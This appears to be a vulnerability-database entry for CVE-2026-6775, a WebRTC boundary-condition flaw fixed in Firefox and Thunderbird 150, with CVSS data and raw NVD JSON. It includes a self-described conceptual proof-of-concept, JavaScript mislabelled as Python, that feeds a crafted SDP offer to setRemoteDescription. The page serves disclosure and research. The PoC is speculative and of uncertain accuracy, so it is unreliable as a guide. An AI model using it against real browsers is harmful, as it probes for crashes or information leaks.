Security Vulnerability Report
中文
CVE-2026-6775 CVSS 5.3 MEDIUM

CVE-2026-6775

Published: 2026-04-21 13:16:23
Last Modified: 2026-04-22 15:17:56

Description

Incorrect boundary conditions in the WebRTC component. This vulnerability was fixed in Firefox 150 and Thunderbird 150.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 150
Mozilla Thunderbird < 150

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * Conceptual Proof of Concept for CVE-2026-6775 * This script attempts to trigger the WebRTC boundary condition vulnerability. * Note: This is a simplified example based on the vulnerability description. */ // Create a PeerConnection object const pc = new RTCPeerConnection(); // Create a data channel to interact with WebRTC internals const dataChannel = pc.createDataChannel("testChannel"); // Craft a malicious SDP (Session Description Protocol) offer // that attempts to hit the incorrect boundary condition in the parser. // Adjusting parameters to extreme values might trigger the check failure. const maliciousSDP = ` v=0 o=- 0 0 IN IP4 127.0.0.1 s=- c=IN IP4 127.0.0.1 t=0 0 m=video 9 RTP/AVP 96 a=rtpmap:96 VP8/90000 a=fmtp:96 max-fr=999999; max-fs=999999; `; try { // Set the remote description to the crafted payload pc.setRemoteDescription(new RTCSessionDescription({ type: 'offer', sdp: maliciousSDP })).then(() => { console.log("[+] Payload sent, check for crash or info leak"); }).catch(e => { console.log("[-] Failed to set remote description:", e); }); } catch (error) { console.log("[-] Exception thrown:", error); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6775", "sourceIdentifier": "[email protected]", "published": "2026-04-21T13:16:23.260", "lastModified": "2026-04-22T15:17:55.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect boundary conditions in the WebRTC component. This vulnerability was fixed in Firefox 150 and Thunderbird 150."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "150.0", "matchCriteriaId": "67B01D49-66FA-4C76-9EB4-2B8CD61FBEB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "150.0", "matchCriteriaId": "5DDDA58D-2B1E-4956-9CC2-45B3017F3F0B"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2021768", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-30/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-33/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}